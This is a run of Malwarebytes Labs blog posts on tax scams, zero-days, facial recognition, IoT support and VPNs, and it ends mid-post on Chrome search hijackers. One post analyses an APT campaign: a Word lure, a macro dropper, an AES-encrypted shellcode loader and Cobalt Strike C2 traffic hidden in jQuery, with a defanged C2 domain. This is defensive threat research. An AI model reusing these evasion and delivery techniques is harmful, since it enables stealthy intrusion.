This year, however, cybercriminals are exploiting the nation’s anxiety around COVID-19 and the increasingly grim economic outlook. The IRS has released multiple consumer alerts since shelter in place started back in March, warning American’s to be on the lookout for email and phone phishing attacks aimed at stealing refunds and Economic Impact Payments (EIP).

Beyond having your money stolen, tax ID theft can also damage your credit and cost you in time. It can take upwards of 600 hours to restore a stolen identity, according to the Identity Theft Resource Center.

Fortunately, protecting against the various tax season scams is relatively easy. All it takes is a little common sense and a basic understanding of the social engineering ploys scammers will try to use against you. With that said, here are some tried and true tips to help stay secure during this very unusual tax season.

For general tax preparedness

If you haven’t already filed, now’s the time to get a move on. Not only will you beat the rush, but you can ensure a faster return on your return. Mistakes, including those that can lead to identity theft, are made when you’re scrambling to dig up that charitable donation receipt from Goodwill five minutes before filing deadline.

Next, pick a preparer. Do your due diligence and check out any reviews or articles on tax software, if you plan to use it. Research online tax service providers to see how secure their systems are. Sites should have password standards, a lock-out feature that blocks users after too many unsuccessful login attempts, security questions, and email and/or text verification. If using an accountant, look for referrals. Remember that cheapest may not always be the best.

Finally, once you’ve filed, make sure to keep your tax returns someplace safe. If filing online, you’ll receive a massive PDF that you can download to your desktop. If someone were to access your computer a year from now, all that juicy information would be theirs for the taking. So be sure to either store it in an encrypted cloud service or put it on a removable drive, such as a USB. If filing on paper, keep your taxes in a locked file cabinet or drawer.

For online security

This is important for anyone transmitting sensitive data online, whether that’s shopping or filing taxes: be sure to use a connection that’s secure. If on a home computer and network, use password-protected Wi-Fi and look for properly-secured browsers (website URLs that start with “https” and display a small lock icon). Be sure your preparer has the same security in place. Never, ever, ever file your taxes using public Wi-Fi.


In addition, when filing taxes online (and again, this applies to any online service that requires a password), choose passwords that are long and complex. Avoid plain text passwords, use special characters, and if allowed, use spaces. We also highly recommend a password vault or manager that uses two-factor authentication.

The third pillar of Internet security (especially during tax season) is to be aware of social engineering scams, including phishing emails. A popular phishing technique is to send an email from the “IRS” that says, essentially, “We have your tax return ready and you can get your money faster if you just download this PDF!” Nope. Number one, you should never open an attachment from an email you aren’t expecting to receive. Number two, the IRS will not email you. They’ll physically mail you information, but even then, be wary. Tax scams can happen via postal mail, too.

In addition to phishing attacks, there are reports of cold callers who say, essentially, “Hey, we’re from the IRS and you owe us $10,000.” Nope. The IRS won’t call you either. If you receive an email or phone call that’s unsolicited and is looking for personal information, don’t give it. Go back and independently verify who is trying to reach you.

Since shelter in place started back in March, criminals have been using a variety of phishing scams relating to coronavirus. Be wary of any emails purporting to be from the IRS or otherwise, throwing around the terms “coronavirus, “COVID-19,” and “stimulus.” Be especially wary of anyone claiming they can get you additional EIP money or a bigger refund.

After mastering the basics of online security, it’s a good idea to protect yourself using a little technology. Before you even start typing in your social security number, you should run at least one cybersecurity scan. That way, you’re sure there’s no malware on your system, such as a keylogger or spyware that can record your information without you knowing. You should also make sure your operating system, browser, and other software programs are updated—that way, you protect against malware that might exploit vulnerabilities in your computer.

Finally, if you believe there’s a chance you could have been compromised, look into free credit monitoring or ID theft services. (A caveat to this: Only use the free services, as paying for them is unnecessary and redundant with what credit card companies and banks are already doing.) By law, you are entitled to a free copy of your credit report from the major bureaus: Equifax, Experian, and Trans Union. In addition, there’s a lesser-known fourth bureau called Innovis that you can also use. Review your reports annually and look for any suspicious activity.

Filing early, being prepared, staying vigilant online, and employing the proper security technology—if you follow these tips then you can not only keep cybercriminals from cashing in on your tax returns but also from taxing your peace of mind.

The post Coughing in the face of scammers: security tips for the 2020 tax season appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A zero-day guide for 2020: Recent attacks and advanced preventive techniques

Malware Bytes Security - Tue, 06/23/2020 - 11:00am

Zero-day vulnerabilities enable threat actors to take advantage of security blindspots. Typically, a zero-day attack involves the identification of zero-day vulnerabilities, creating relevant exploits, identifying vulnerable systems, and planning the attack. The next steps are infiltration and launch. 

This article examines three recent zero-day attacks, which targeted Microsoft, Internet Explorer, and Sophos. Finally, you will learn about four zero-day protection and prevention solutions—NGAV, EDR, IPsec, and network access controls. 

What is a zero-day vulnerability?

Zero-day vulnerabilities are critical threats that are not yet publicly disclosed or that are only discovered as the result of an attack. By definition, vendors and users do not yet know about the vulnerability. The term zero-day stems from the time the threat is discovered (day zero). From this day a race occurs between security teams and attackers to respectively patch or exploit the threat first. 

Anatomy of a zero-day attack

A zero-day attack occurs when criminals exploit a zero-day vulnerability. The timeline of a zero-day attack often includes the following steps. 

  1. Identifying vulnerabilities: Criminals test open source code and proprietary applications for vulnerabilities that have not yet been reported. Attackers may also turn to black markets to purchase information on vulnerabilities that are not yet public. 
  2. Creation of exploits: Attackers create a kit, script, or process that enables them to exploit the discovered vulnerability.
  3. Identifying vulnerable systems: Once an exploit is available, attackers begin looking for affected systems. This may involve using automated scanners, bots, or manual probing. 
  4. Planning the attack: The type of attack that a criminal wants to accomplish determines this step. If an attack is targeted, attackers typically carry out reconnaissance to reduce their chance of being caught and increase the chance of success. For general attacks, criminals are more likely to use phishing campaigns or bots to try to hit as many targets as quickly as possible.
  5. Infiltration and launch: If a vulnerability requires first infiltrating a system, attackers work to do so before deploying the exploit. However, if a vulnerability can be exploited to gain entry, the exploit is applied directly. 
Recent examples of attacks

Effectively preventing zero-day attacks is a significant challenge for any security team. These attacks come without warning and can bypass many security systems. Particularly those relying on signature-based methods. To help improve your security and decrease your risk, you can start by learning about the types of attacks that have recently occurred.


In March 2020, Microsoft warned users of zero-day attacks exploiting two separate vulnerabilities. These vulnerabilities affected all supported Windows versions and no patch was expected until weeks later. There is not currently a CVE identifier for this vulnerability. 

The attacks targeted remote code execution (RCE) vulnerabilities in the Adobe Type Manager (ATM) library. This library is built into Windows to manage PostScript Type 1 fonts. The flaws in ATM enabled attackers to use malicious documents to remotely run scripts. The documents arrived through spam or were downloaded by unsuspecting users. When opened, or previewed with Windows File Explorer, the scripts would run, infecting user devices. 

Internet Explorer

Internet Explorer (IE), Microsoft’s legacy browser, is another recent source of zero-day attacks. This vulnerability (CVE-2020-0674) occurs due to a flaw in the way the IE scripting engine manages objects in memory. It affected IE v9-11.

Attackers are able to leverage this vulnerability by tricking users into visiting a website crafted to exploit the flaw. This can be accomplished through phishing emails or through redirection of links and server requests.


In April 2020, zero-day attacks were reported against the Sophos’ XG firewall. These attacks attempted to exploit a SQL injection vulnerability (CVE-2020-12271) targeting the firewall’s built-in PostgreSQL database server.

If successfully exploited, this vulnerability would enable attackers to inject code into the database. This code could be used to modify firewall settings, granting access to systems or enabling the installation of malware. 

Protection and prevention

To properly defend against zero-day attacks, you need to layer advanced protections on top of your existing tools and strategies. Below are a few solutions and practices designed to help you detect and prevent unknown threats. 

Next-generation antivirus

Next-generation antivirus (NGAV) expands upon traditional antivirus. It does this by including features for machine learning, behavioral detection, and exploit mitigation. These features enable NGAV to detect malware even when there is no known signature or file hash (which traditional AV relies on). 

Additionally, these solutions are often cloud-based, enabling you to deploy tooling in isolation and at scale. This helps ensure that all of your devices are protected and that protections remain active even if devices are affected.

Endpoint detection and response

Endpoint detection and response (EDR) solutions provide visibility, monitoring, and automated protections to your endpoints. These solutions monitor all endpoint traffic and can use artificial intelligence to classify suspicious endpoint behaviors, like, for example, to frequent requests or connections from foreign IPs. These capabilities enable you to block threats regardless of the attack method. 

Additionally, EDR features can be used to track and monitor users or files. As long as the tracked aspect behaves within normal guidelines, no action is taken. However, as soon as behavior deviates, security teams can be alerted. 

These capabilities require no knowledge of specific threats. Instead, capabilities leverage threat intelligence to make generalized comparisons. This makes EDR effective against zero-day attacks. 

IP security

IP Security (IPsec) is a set of standard protocols used by Internet engineering task forces (IETFs). It enables teams to apply data authentication measures, and to verify integrity and confidentiality between connection points. It also enables encryption and secure key management and exchange. 

You can use IPsec to authenticate and encrypt all of your network traffic. This enables you to secure connections and to quickly identify and respond to any non-network or suspicious traffic. These abilities enable you to increase the difficulty of exploiting zero-day vulnerabilities and decrease the chance that attacks are successful. 

Implement network access controls

Network access controls enable you to segment your networks in a highly granular way. This allows you to define exactly which users and devices can access your assets and through what means. This includes restricting access to only those devices and users with the appropriate security patches or tooling. 

Network access controls can help you ensure that your systems are protected without interfering with productivity or forcing complete restriction of external access. For example, the type of access needed when you host software as a service (SaaS). 

These controls are beneficial for protecting against zero-day threats because they enable you to prevent lateral movement in your networks. This effectively isolates any damage a zero-day threat may cause. 

Staying safe

Recent zero-day attacks show that more and more threat actors find an easy mark in endpoint users. The zero-day attack on Microsoft exploited ATM vulnerabilities to trick users into opening malware. When threat actors exploited an Internet Explore zero-day vulnerability, they tricked users into visiting malicious sites. The zero-day attack on Sophos could potentially grant user access to threat actors. 

However, while zero-day attacks are difficult to predict, it is possible to prevent and block these attacks. EDR security enables organizations to extend visibility into endpoints, and next-generation antivirus provides protection against malware without having to rely on known signatures. IPsec protocols enable organization to authenticate and encrypt network traffic, and network access controls provide the tools to deny access to malicious actors. Don’t let threat actors have the upper hand. By utilizing and layering several of these tools and approaches, you can better protect your employees, your data, and your organization.

The post A zero-day guide for 2020: Recent attacks and advanced preventive techniques appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Lock and Code S1Ep9: Strengthening and forgetting passwords with Matt Davey and Kyle Swank

Malware Bytes Security - Mon, 06/22/2020 - 11:00am

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Matt Davey, chief operations optimist at 1Password, and Kyle Swank, a member of 1Password’s security team, about—what else—passwords.

We may know it’s important to have a strong, non-guessable, lengthy password, and yet we still probably all know someone who writes their password on a post-it, which is then affixed literally onto their machine. On today’s episode, we discuss secure passwords, password alternatives, and the future—and potential death—of passwords.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes storeGoogle Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:
  • End of Line: We look at what happens in a world where your expensive home devices can lose support without much warning
  • Facial recognition technology: We provide a rundown on which companies recently decided to not provide the technology to law enforcement.
Plus other cybersecurity news:
  • Business email compromise: scam email trends in the age of Coronavirus (Source: Help Net Security)

Stay safe, everyone!

The post Lock and Code S1Ep9: Strengthening and forgetting passwords with Matt Davey and Kyle Swank appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Facial recognition: tech giants take a step back

Malware Bytes Security - Thu, 06/18/2020 - 11:30am

Last week, a few major tech companies informed the public that they will not provide facial recognition software to law enforcement. These companies are concerned about the way in which their technology might be used.

What happens when software that threatens our privacy falls into the hands of organization which we no longer trust? In general, being aware of tracking software causes a feeling of being spied on and a feeling of insecurity. This insecurity that spreads throughout society is likely causing these companies to revise their strategy. Current developments surely have had an impact on an already distorted social environment. A pandemic and worldwide protests are a mix we have never experienced before in human history.

Definition of facial recognition

The definition of facial recognition, or “face recognition” as the Electronic Frontier Foundation (EFF) defines it, is:

A method of identifying or verifying the identity of an individual using their face. Face recognition systems can be used to identify people in photos, video, or in real-time.

Facial recognition is one of the technologies that even laymen can understand in how it can be used against citizens by a malevolent or untrustworthy government. Other methods like social profiling and behavioral analysis are more elusive and less easy to comprehend.

In an earlier blog, we already discussed the very different rules, laws and regulations that exist around the world when it comes to facial recognition. Depending on the type of government and the state of technology, the rules are very different—or they don’t exist at all.

The stated bans by Amazon, IBM, and Microsoft announced over the course of one week, however, were more or less directly aimed at US organizations, perhaps as a result of a growing distrust about local law enforcement agencies in general and due to the behavior of some police departments in particular. But we can likely expect these bans to spread out across the world. (And I think that is a good thing.) Laws have a tendency to follow the developments in society, always trailing one step behind. But in this case it looks important enough to wait until the development and legislature can go hand in hand.

The companies

Microsoft halted the sale of facial recognition technology to law enforcement in the US, stating that the ban would stick until federal laws regulating the technology’s use were put into place. In other words, they want to have rules in place for the use of the technology before they provide it.

Amazon, which is potentially one of the biggest players in this space, has their own custom tech called Rekognition. It’s being licensed to businesses and law enforcement. Earlier on, Amazon had already announced a similar ban for very much the same reason, letting the public know that it would require “stronger regulations to govern the ethical use of facial recognition technology.”

IBM did not limit the ban to the US but it did explain their motives in a letter to Congress. In this letter the company addressed the subject by writing it had no plans to market facial recognition software if it would be used “for mass surveillance, racial profiling, violations of basic human rights and freedoms, or any purpose which is not consistent with our values and Principles of Trust and Transparency.”

Why we do not want facial recognition

Many groups like American Civil Liberties Union (ACLU) and EFF have made objections against this technology as it is considered a breach of privacy to use biometrics to track and identify individuals without their consent. Many feel that there is already more than enough technology out there that keeps track of our behavior, preferences, and movement. The technology does not necessarily always know who we are down to the level of personally identifiable information (PII). Many people get uneasy when they find out how well aware advertisers and shops are of our preferences by tracking our browsing habits and online purchases.

And some incidents certainly don’t help the case at all. For example, the Baltimore police department reportedly ran social media photos through face recognition to identify protesters and arrest them.

Another example of using this technology for a purpose separate than what it was intended for—and also another possible reason for distrust—was the fact that Minnesota police resorted to what it called “contact-tracing” demonstrators arrested after recent protests. But “contact tracing” is a public health effort to help stop the spread of disease like the COVID-19 outbreak. As it turns out, the Minnesota police are looking at it as a model for criminal investigations.

Facial recognition still has its limits

Another objection against facial recognition technology has always been the inaccuracy. There are significant risks that facial recognition used in law enforcement is unreliable.

Most facial recognition software relies on Artificial Intelligence (AI) and, more precisely, Machine Learning (ML). Where facial recognition relies on machine learning the training data is often incomplete or unrepresentative of the general population. A study from MIT Media Lab shows that facial recognition technology works differently across gender and races. In cases where misidentification can lead to arrest or incarceration, we will surely want to avoid such grave errors due to false positives.

Will we ever be ready for facial recognition to be used by law enforcement?

What surely will need to happen is that law enforcement regains the trust of the public in general and that laws regulating the use of facial recognition software will be made effective to satisfy the demands of the manufacturers of facial recognition software.

Whether that means we can lie back and rely on the forces at work to do the right thing is a whole other topic. A large majority of humanity seems to be torn between “I have nothing to hide” and “they already know everything” anyway. That is not a healthy situation and the degree of unease largely depends on which country you happen to live in and many other circumstances beyond your control.

So, even though the chances of facial recognition getting widely used by law enforcement seem to be put on a lower level in the US, this remains a topic to keep an eye on if you value your privacy.

The post Facial recognition: tech giants take a step back appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Multi-stage APT attack drops Cobalt Strike using Malleable C2 feature

Malware Bytes Security - Wed, 06/17/2020 - 1:30pm

This blog post was authored by Hossein Jazi and Jérôme Segura

On June 10, we found a malicious Word document disguised as a resume that uses template injection to drop a .Net Loader. This is the first part of a multi-stage attack that we believe is associated to an APT attack. In the last stage, the threat actors used Cobalt Strike’s Malleable C2 feature to download the final payload and perform C2 communications.

This attack is particularly clever for its evasion techniques. For instance, we observed an intentional delay in executing the payload from the malicious Word macro. The goal is not to compromise the victim right away, but instead to wait until they restart their machine. Additionally, by hiding shellcode within an innocuous JavaScript and loading it without touching the disk, this APT group can further thwart detection from security products.

Lure with delayed code execution

The lure document was probably distributed through spear phishing emails as a resume from a person allegedly named “Anadia Waleed.” At first, we believed it was targeting India but it is possible that the intended victims could be more widespread.

Figure 1: Resume

The malicious document uses template injection to download a remote template from the following url:


Figure 2: Template injection

The domain used to host the remote template was registered on February 29, 2020 by someone from Hong Kong. Creation time for the document is 15 days after this domain registration.

The downloaded template, “indexa.dotm”, has an embedded macro with five functions:

  • Document_Open
  • VBA_and_Replace
  • Base64Decode
  • ChangeFontSize
  • FileFolderExist.

The following shows the function graph of the embedded macro.

Figure 3: Macro functions graph

The main function is Document_open which is executed upon opening the file. This function drops three files into the victim’s machine:

  • Ecmd.exe: UserForm1 and UserForm2 contain two Base64 encoded payloads. Depending on the version of .Net framework installed on the victim’s machine, the content of UserForm1 (in case of .Net v3.5) or UserForm2 (other versions) is decoded and stored in “C:\ProgramData”.
  • cf.ini: The content of the “cf.ini” file is extracted from UserForm3 and is AES encrypted, which later on is decrypted by ecmd.exe.
  • ecmd.exe.lnk: This is a shortcut file for “ecmd.exe” and is created after Base64 decoding the content of UserForm4. This file is dropped in the Startup directory as a trigger and persistence mechanism.

Ecmd.exe is not executed until after the machine reboots.

Figure 4: Document_Open Figure 5: Custom Base64 decode function

ChangeFontSize and VBA_and_Replace functions are not malicious and probably have been copied from public resources [1, 2] to mislead static scanners.

Intermediary loader

Ecmd.exe is a .Net executable that pretends to be an ESET command line utility. The following images show the binary certificates, debugger and version information.

The executable has been signed by “ESET, spol. s r.o.” and its version information shows that this is an “Eset command line interface” (Figure 6-8).

Figure 6: Certificate information Figure 7: Version information Figure 8: Debugger information

ecmd.exe is a small loader that decrypts and executes the AES encrypted cf.ini file mentioned earlier. It checks the country of the victim’s machine by making a HTTP post request to ““. It then parses the XML response and extracts the country code.

Figure 9: Getcon function: make http post request to “” Figure 10: output

If the country code is “RU” or “US” it exits; otherwise it starts decrypting the content of “cf.ini” using a hard-coded key and IV pair.

Figure 10: ecmd.exe main function

The decrypted content is copied to an allocated memory region and executed as a new thread using VirtualAlloc and CreateThread APIs.

Figure 11: runn function ShellCode (cf.ini)

A Malleable C2 is a way for an attacker to blend in command and control traffic (beacons between victim and server) with the goal of avoiding detection. A custom profile can be created for each target.

The shell code uses the Cobalt Strike Malleable C2 feature with a jquery Malleable C2 profile to download the second payload from “time.updateeset[.]com”.

Figure 12: Malleable C2 request

This technique has been used by two other recent Chinese APTs—Mustang Panda and APT41.  

The shellcode first finds the address of ntdll.exe using PEB and then calls LoadLibrayExA to load Winint.dll. It then uses InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA and HttpSendRequestA APIs to download the second payload.
The API calls are resolved within two loops and then executed using a jump to the address of the resolved API call.

Figure 13: Building API calls

The malicious payload is downloaded by InternetReadFile and is copied to an allocated memory region.

Figure 14: InternetReadFile

Considering that communication is over HTTPS, Wireshark is not helpful to spot the malicious payload. Fiddler was not able to give us the payload either:

Figure 15: Fiddler output

Using Burp Suite proxy we were able to successfully verify and capture the correct payload downloaded from time.updateeset[.]com/jquery-3.3.1.slim.min.js. As can be seen in Figure 16, the payload is included in the jQuery script returned in the HTTP response:

Figure 16: Payload happened to the end of jquery

After copying the payload into a buffer in memory, the shellcode jumps to the start of the buffer and continues execution. This includes sending continuous beaconing requests to “time.updateeset[.]com/jquery-3.3.1.min.js” and waiting for the potential commands from the C2.  

Figure 17: C2 communications

Using Hollow Hunter we were able to extract the final payload which is Cobalt Strike from ecmd’s memory space.


A precise attribution of this attack is a work in progress but here we provide some insights into who might be behind this attack. Our analysis showed that the attackers excluded Russia and the US. The former could be a false flag, while the latter may be an effort to avoid the attention of US malware analysts.

As mentioned before, the domain hosting the remote template is registered in Hong Kong while the C2 domain “time.updateeset[.]com” was registered under the name of an Iranian company called Ehtesham Rayan on Feb 29, 2020. The company used to provide AV software and is seemingly closed now. However, these are not strong or reliable indicators for attribution.

Figure 11: whois registration information

In terms of TTPs used, Chinese APT groups such as Mustang Panda and APT41 are known to use jQuery and the Malleable C2 feature of Cobalt Strike. Specifically, the latest campaign of Mustang Panda has used the same Cobalt Strike feature with the same jQuery profile to download the final payload which is also Cobalt Strike. This is very similar to what we saw in this campaign, however the initial infection vector and first payload are different in our case.


Anadia Waleed resume.doc

Remote Template: indexa.dotm

Remote Template Url:




Cf.ini shell-code after decryption:

Cobalt Strike downloaded shellcode:

Cobalt Strike payload

The post Multi-stage APT attack drops Cobalt Strike using Malleable C2 feature appeared first on Malwarebytes Labs.

Categories: Malware Bytes

End of line: supporting IoT in the home

Malware Bytes Security - Wed, 06/17/2020 - 11:30am

Trouble is potentially brewing in Internet of Things (IoT) land, even if the consequences may still be a little way off. System updates and issues surrounding expiring certificates will pose problems for manufacturers and headaches for consumers.

System updates for fun and profit

One of the first mainstream collisions of putting updates out to pasture and angry device owners yelling “Why doesn’t this work anymore” was probably at the tail end of 2019 and involved streaming giant Netflix. If you have internet connected devices, then those devices will require updating. It may be a security issue, it could be a UI redesign, perhaps the code deep down in the guts between the backend and what you see in front of you has had a change cascading its way through how everything operates.

People realised this very quickly when Netflix started letting people know their TVs would no longer work quite how they had previously. This approach makes sense; there’s only so much you can do with older bits and pieces of hardware with regards the ever-present march of the new. At some point, it simply won’t be able to cut the mustard and then (best case scenario) you’re having to fall back on third party apps instead of official solutions. That could end up being a security risk all by itself.

Not so smart device?

White goods like fridges, freezers, and more general kitchen equipment around the home, are usually pretty expensive. Devices with IoT tech in them, even more so. You’re paying a premium for functionality you may not use that often. It’s likely some folks buy IoT devices for the home without even knowing they possess said capability. It’d certainly go some way to explaining why so many of these things are found online, unsecured, with no password (or a fixed password easily Googled).

Into this hot mess steps a number of expectations; primarily among them, how long you can expect the device to be supported.  We’re not talking about apps allowing you perform smaller tasks now, so much as we are raising expectations about core functionality. Namely: how long will manufacturers ensure our IoT device, all hooked up to the big wide web, keep ticking over. Not only in terms of “does it work”, but also “is it still secure?”

As always, the devil is in the details (or at least some additional information).

Mapping out the end times

Planned obsolesce is something that’s been around in tech circles for years. The basic idea is to keep making money by building in some form of limited shelf life into a device, in a way which makes you continually fork over some cash above  and beyond the original purchase…because  you’re now onto the next one…and the one after that…and the latest model does a handful of new things,  so you’d better buy that too…

You get the idea. Design cycles become shorter, new product releases are rushed out the door, potentially filled with bugs, leaving you to wonder if the new additions could’ve been included in the product you already own.

The addition of more new and intricate technology in white goods is arguably adding to the list of things which could break and/or go wrong over time. Reliance on the ever-shifting sands of the Internet also means things will simply go out of date a lot faster than if it were a plain old washing machine, tumble drier, or fridge.

It’s wise not to become too wrapped up in conspiracy theories on this subject; some caution is advised. By the same token, this is absolutely a thing that happens and major organisations have caught some heat for it.

Even so, we’re now at a point where IoT is firmly established in homes whether we like it or not. More of our devices are becoming internet connected; even if you purposely go out of your way to avoid it, chances are you’ll begrudgingly get stuck with it at some point. For most people in that situation, it tends to end up being a television set. However, the IoT sky is the limit and it could be pretty much anything, really.

Behold my impressive collection of legal documents

At this point, we’re at warranties and guarantees. These can differ greatly with regards to protection depending on where you live, but they are typically tied to laws relevant to your area. You’d think it’d be straightforward; in actual fact, it’s more along the lines of Cole Porter singing Anything Goes as he desperately tries to make sense of 600 pages of legalese.

More often than not, the extended warranty is what offers the most protection. It’s also the one which involves handing over more money, registering on the website, sending off a card, or just forgetting to do any of those previously mentioned then panicking when the toaster explodes.

With all new IoT tech inside your washing machine, you may well be more likely to want extra protection in the event of things going wrong. One slight annoyance, Cole Porter yells from behind his impressive correction of legal documents: will that fancy extended 7-year warranty outlive the IoT tech in your fridge?

Going back to the above article, it’s all a bit worryingly vague. When asked how long support can be expected, answers range from “issued as required,” to “up to ten years,” and at least one vendor who said “a maximum of two years,” with the not massively reassuring caveat that support is not limited to two years.

Glad we’ve cleared that one up, then. Thanks, Cole.

As per the “Which report?” advice, you may have to start asking manufacturers exactly how long IoT tech in a device will be supported versus the length your warranty runs for. Good luck.

Be certain with your certificates

SSL certificates help keep the web safe by firing up the old encryption cannon and ensuring everything you do is kept from prying eyes, be it regular browsing, online banking, gaming, or just streaming some TV shows. The problem is, lots of those certificates are due to expire in the next few years and all of those IoT devices in your home making use of them could be caught in the fallout.

Such a thing impacted users of Roku, who found an expiring certificate broke their service. More general warnings of certificate expiration peg the next big fallout sometime around the tail end of 2021. I, for one, am looking forward to the immense joy gleaned from being told by text that the SSL certificate on my fridge freezer has expired and I’ll have to fix it myself.

A televisual turning point

With all of the above becoming things for a harried shopper to consider, it’s worth remembering that the smart in some devices gives manufacturers additional valuable data on people buying their things. I hope you like adverts the moment you fire up your TV, or the big box in your front room watching pretty much everything you do related to it.

It’s in their interest to push digital into as many devices as possible, and claims from manufacturers already exist that stripping the previously not included smart tech from devices, would make said devices more expensive. Put simply: it isn’t going away anytime soon.

Warranties which may not warranty, certificates which might fail to certify, lifespans which don’t match the length of cover promised, and data harvested from advertisements to try and upsell more smart tech. That’s the current lie of the land when you next go out to replace that 5 year old fridge in need of patching up.

Should you figure it out, please let us know – I think we’d all appreciate the helping hand.

The post End of line: supporting IoT in the home appeared first on Malwarebytes Labs.

Categories: Malware Bytes

VPNs: should you use them?

Malware Bytes Security - Tue, 06/16/2020 - 11:30am

We are going to talk today about something you’ve likely heard of before: VPNs, or Virtual Private Networks. We at Malwarebytes have delved into these tools in greater depth, and we’ve literally discussed them on the digital airwaves.

But we want to answer a question we’ve been getting more and more. Folks aren’t as curious about what a VPN is anymore, as they are about whether they should use one.

The answer is: it depends. For that, we’re here to help.

How a VPN works

To understand how a VPN works and whether you should use one, it is best to first understand what happens when you’re browsing the Internet. Whenever you open up a web browser and go to a website, you’re connecting to that website and exchanging information with it. This is your Internet “traffic,” and it can reveal quite a bit of information about you, including what websites you visit, your IP address, and more.

A VPN acts like a “tunnel” for your Internet traffic. Your traffic goes into the tunnel, and emerges out of one of the exit nodes of the VPN service. The tunnel encrypts your data, making it undecipherable to your Internet Service Provider (ISP). At best, your ISP can see that some encrypted traffic is going to a VPN service, but not the contents of that traffic, and not where it comes out of.

The interesting thing to note here is that, with this basic functionality, a VPN can actually serve many different needs. As we wrote before:

Depending on who you ask, a VPN is any and all of these: [1] a tunnel that sits between your computing device and the Internet, [2] helps you stay anonymous online, preventing government surveillance, spying, and excessive data collection of big companies, [3] a tool that encrypts your connection and masks your true IP address with one belonging to your VPN provider, [4] a piece of software or app that lets you access private resources (like company files on your work intranet) or sites that are usually blocked in your country or region.

Without a VPN, your Internet Service Provider, or ISP, can see almost everything you interact with online. Who you connect to, what type of traffic, where you are geographically. No bueno.

Obscuring your traffic with a VPN

If you use a VPN, your ISP knows you’ve connected to a VPN, but it cannot inspect the content of your traffic, and does not know where it comes out at the other end.

Also, despite the recent surge in popularity for VPNs, these tools have been in use for businesses for a long time now. They are typically used to access resources remotely as if you were at the office.

In some cases we have even seen performance boosts by using a VPN, where artificial throttling is circumvented by the use of a VPN. Because you’re tunneling your connection, your ISP can’t peek at your traffic and throttle it, based on the kind of traffic. Believe it or not, this is a real issue, and some ISPs throttle users’ traffic when they see file sharing for example.

Consumer recommendations

There are several paths you can take when deciding to implement a VPN. Not only do these tools works on your personal devices like your laptops and mobile phones, but, in some cases, you can insert your own router into the mix.

In many cases, the router provided by your ISP is not a device that you fully control, and using it for your networking needs might open you to possible security issues.

These devices sometimes have administrative functions that aren’t accessible to subscribers. Some mid to higher range routers offered on the market today allow you to put the VPN on the router, effectively encapsulating all your traffic.

The hardware route

A possible solution would be to get such a router and install the VPN on it, rather than on your individual machines. This has the added bonus that it provides VPN protection to devices that don’t support VPNs, like handhelds, consoles, and smart devices.

In the past, we have seen ISP hardware breached by hard coded accounts on the modem/routers they offer to their subscribers.

Sadly, ISP customer support often balks at helping out if you insert your own equipment in the mix. (In fact, they might make you remove it from the equation before they’ll provide support.)

This solution is specific to each router, and a bit more advanced.

The software route

You can also use a VPN application provided by the VPN provider. This application will provide VPN tunneling to the computer it is installed on, and only that, so keep that in mind.

One of the strongest options to consider for your software solution is a “kill switch” functionality. This ensures that if anything happens to the VPN application, it doesn’t “fail open” or allow internet traffic through if the VPN is broken. Think about it. You’re installing this application for the explicit functionality that it can tunnel your traffic. If the app malfunctions, there might be privacy risks in the app still allowing you to connect to the Internet, but letting your traffic go un-tunneled.

More than anything, a kill switch prevents the chance that you’re operating with a false sense of security. What you say online, and the chance that it was you who said it, can draw attention in some countries with far stricter laws on free speech.

Another factor that makes a VPN really perform is when they have a lot of exit nodes. These exit nodes are locations that can be used to circumvent geolocation. The more that are available, and the greater the variety, the more versatile and useful the VPN service is.

Speed is also a factor for VPN exit nodes. There’s not much point in having a ton of exit nodes unless they’re fast. One of the drawbacks of using a VPN is that by adding all these “hops” between nodes, your traffic will take longer to route. If the nodes are reasonably fast, the end user shouldn’t notice significant slowdowns.

You should have a VPN provider that doesn’t discriminate the type of traffic that flows through their network. Some smaller VPNs don’t have the necessary infrastructure to handle large volumes of Peer-to-peer or bittorrent traffic, and either ban it outright or have actual data caps.

Final thoughts

Remember, when you’re thinking about adopting one of these tools, you’re transferring trust: When you use a VPN you transfer access to your traffic to a 3rd party, the VPN provider. All that visibility that users balk at relinquishing to their ISP has now been handed over to their VPN provider. Careful consideration should be given to the trustworthiness of said VPN provider.

There are documented cases where a VPN provider revealed that their users could be de-anonymized and that the VPN provider did in fact keep logs and was willing to turn them over.

Remember, VPNs should not be viewed as shadowy tools. They are, in all actuality, business and privacy tools. They let the researchers who fight malware find out what that malware actually does. They let employees connect to company resources away from the office—which is of the utmost importance today. And they allow you, the user, to reclaim a measure of privacy.

It is therefore important to choose carefully. Most VPNs offer a service where they promise not to log or inspect your traffic. In many cases, though, this claim is impossible to verify.

The best option for VPNs, then? Read reviews, scour forums, and look for the functionalities that are important, specifically, to you. You may find what you’re looking for just around the corner.

The post VPNs: should you use them? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (June 8 – 14)

Malware Bytes Security - Mon, 06/15/2020 - 11:30am

Last week on Malwarebytes Labs, we looked into nasty search hijackers that worried a lot of Chrome users; a list of considerations for MSPs when looking for an RMM platform; the complaint faced by ParetoLogic, the company that issues SpeedyPC, a product that claims to find and remove various PC errors; and a ransomware attack that affected car manufacturers like Honda and Enel.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (June 8 – 14) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Search hijackers change Chrome policy to remote administration

Malware Bytes Security - Thu, 06/11/2020 - 11:30am

The latest type of installer in the saga of search hijacking changes a Chrome policy which tells users it can’t be removed because the browser is managed from the outside.

As you can imagine, that has freaked out quite a few Chrome users.

We have talked about the search hijacker’s business model in detail. Suffice to say, it is a billion-dollar industry and a lot of search hijackers want a piece of this action as even a small portion can amount to a hefty income.

One search hijacker doesn’t generate large amounts of cash for threat actors, like ransomware or banking Trojans. So, the publishers are always looking for ways to get installed on large numbers of systems and stay installed for as long as possible.

It also should not come as a surprise that ethics are no priority for many of them. As long as they can rake in their redirect fees, they couldn’t care less about your inconvenience of being stuck with a default search provider that you would not have picked yourself.

What have they done this time?

We were alerted by some of our customers who said they were unable to remove Chrome extensions as they ran into this restriction:

